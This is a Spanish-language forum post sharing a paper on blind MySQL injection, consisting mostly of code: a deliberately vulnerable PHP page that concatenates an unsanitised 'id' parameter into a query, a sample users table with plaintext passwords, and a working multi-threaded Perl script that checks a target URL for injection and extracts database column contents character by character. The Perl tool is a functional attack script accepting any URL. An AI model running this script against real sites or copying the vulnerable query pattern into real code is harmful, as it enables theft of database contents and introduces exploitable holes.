Hola, muy buenas noches!
Hacia algun tiempo que no me pasaba por el foro, espero que les vaya todo bien.
Aquí les dejo un texto que realizé en Abril sobre inyecciones a ciegas en MySQL

VER: http://www.milw0rm.com/papers/197
DESCARGAR: http://www.milw0rm.com/papers/download/197


Código PHP Vulnerable:

Código:
<?php 
 
# ---- CONFIG -----
$host = 'localhost';
$dbuser = 'root';
$dbpass = 'password';
$dbname = 'blind';
# -----------------
 
echo "<title>Blind SQL Injection Test - D.O.M LABS 2008</title>";
 
$db = mysql_connect($host, $dbuser, $dbpass);
mysql_select_db($dbname,$db);
 
 
$sql = "SELECT * FROM users WHERE id=".$_GET['id'];
	$query = mysql_query($sql);
 
	if(@mysql_num_rows($query)==0){
		die('No hay columnas');
	}
 
	$result=@mysql_fetch_row($query);
	echo "<h2><center><u>Blind SQL Injection Test<br>D.O.M LABS</u><br><br>";
	echo "<font color='#FF0000'>user_id: </font>".$result[0]."<br>";
	echo "<font color='#FF0000'>username: </font>".$result[1]."<br>";
	// echo "Passwd: ".$result[2]."<br>";
	echo "</h2></center>";
 
	die();
 
?>
Código SQL:

Código:
-- Table: users
-- by ka0x - D.O.M
-- Blind SQL Injection Paper
 
CREATE TABLE `users` (
 `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
 `name` varchar(50) NOT NULL,
 `password` varchar(50) NOT NULL,
 PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
 
-- users --
INSERT INTO `users` VALUES (1, 'administrator', '1234%&_');
INSERT INTO `users` VALUES (2, 'ka0x', 't3st_bl1nd');
INSERT INTO `users` VALUES (3, 'bush', 'terrorist');
-- eof --
Código PERL:

Código:
#!/usr/bin/perl -W
 
# Blind MySQL Injection Paper
# example brute force
 
# -- OPTIONS --
my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 33 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;
# ---
 
use LWP::UserAgent ;
 
sub _HELP_AND_EXIT
{
	die "
 
 ./$0 -u <url> -tn <table> -cn <column> -p <pattern>
 
 Options:
 -u  <url>        Ex: http://www.google.es/vuln.php?id=1
 -tn  <table_name>    Table name.
 -cn  <column_name>    Column name.
 -p  <pattern>      HTML pattern.
 
 Other:
 -t  <#>         Threads, default '$DEFAULT_THREADS'.
 -l  <#>         Maximum table name length '$MAX_FIELD_LENGTH'.
 -T  <#>         Timeout.
 -h            Help (also with --help).
" ;
}
 
 
	my ($p, $w) = ({ @ARGV }, { }) ;
 
	map {
		&_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
	} keys %$p ;
 
	map {
		die "[!] Require: $_\n" unless $p->{ $_ } ;
	} qw/-u -tn -cn -p/ ;
 
	$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
	$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
	$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
 
	map {
		warn "[i] Getting default: $_ $w->{ $_ }\n" ;
	} sort keys %$w ;
 
	( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
 
 
 
 
sub _START_WORK
{
	my $p = shift ;
 
	($p->{'id_value'})	= ( $p->{'-u'} =~ /(\d+)$/ ) ;		# Get the id value
 
	my $position = 1 ;
 
	pipe(R, W) ;
	pipe(Rs, Ws) ;
	autoflush STDOUT 1 ;
 
	my $sql_message = '' ;
	my $msg = '' ;
	my @pid ;
 
	while( $position <= $p->{'-l'} )
	{
		my $cf ;
		unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
		push(@pid, $cf) ;
 
		my $count = 0 ;
		my $can_exit ;
		my $char_printed ;
 
		while(<R>)
		{
			chomp ;
			push(@pid, (split(/:/))[1] ) if /^pid/ ;
 
			my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
			$count++ if $pos == $position ;
 
			print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
 
			if( $res eq 'yes' and $pos == $position ){
					$char_printed = $can_exit = 1 ;
					print Ws "STOP $position\n" ;
					$sql_message .= chr( $ascii ) ;
			}
 
			last if ( $can_exit or $count == @ascii );
		}
 
		map { waitpid($_, 0) } @pid ;
 
		unless( $char_printed )
		{
			if( $EXIT_IF_NO_CHAR )
			{
				warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ;
				last ;
			}
		}
 
		$position++ ;
	}
 
	print "[i] SQL_FIELD:\n$sql_message\n" ;
 
}
 
sub _CHECKING
{
	my ($p, $position) = @_ ;
	my $counter = 0 ;
	my $stop_position ;
 
	foreach my $ascii ( @ascii )
	{
		$counter++ ;
 
		if( $counter % $p->{'-t'} == 0 )
		{
			my $stop_position ;
			eval
			{
				$SIG{'ALRM'} = sub { die "non_stop\n" } ;
				alarm $DEFAULT_THREADS_TIME ;
				my $line = <Rs> ;
				$stop_position = (split( / /, $line))[1] ;
				alarm 0 ;
			} ;
 
			if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
		}
 
		unless(my $pid = fork )
		{
			print Ws "pid:$pid\n" or die ;
 
 
			my $url = $p->{'-u'} .
				' AND ascii(substring((SELECT ' . $p->{'-cn'} .
				' FROM ' . $p->{'-tn'} . ' where id=' .
				$p->{'id_value'} . '),' . $position . ',1))='. $ascii ;
 
			my $ua = LWP::UserAgent->new ;
			$ua->timeout( $p->{'-T'} ) ;
 
			my $content ;
			while( 1 )
			{
				last if $content = $ua->get( $url )->content ;
			}
 
			( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
 
			exit( 0 ) ;
		}
 
	}
}
 
 
 
sub _IS_VULN
{
	my $p = shift ;
 
	my $ua = LWP::UserAgent->new ;
	$ua->timeout( $p->{'-T'} ) ;
 
	my ( $one, $two ) = (
		$ua->get( $p->{'-u'}." AND 1=1")->content ,
		$ua->get( $p->{'-u'}." AND 1=2")->content ,
	) ;
 
	return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
}
Espero que les guste, un saludo!

// ka0x